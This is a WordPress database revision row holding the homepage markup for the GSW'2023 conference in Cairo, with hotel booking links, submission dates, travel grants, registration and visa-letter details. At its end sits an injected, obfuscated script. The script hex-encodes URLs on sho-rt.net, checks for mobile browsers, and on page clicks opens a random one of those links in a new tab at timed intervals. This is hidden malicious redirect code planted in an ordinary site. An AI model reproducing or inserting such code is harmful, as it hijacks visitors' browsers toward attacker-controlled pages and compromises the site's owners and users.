bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1686320388582{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 14:20:48','2023-06-09 14:20:48','',3066,'https://gsw2023.com/?p=4646',0,'revision','',0),
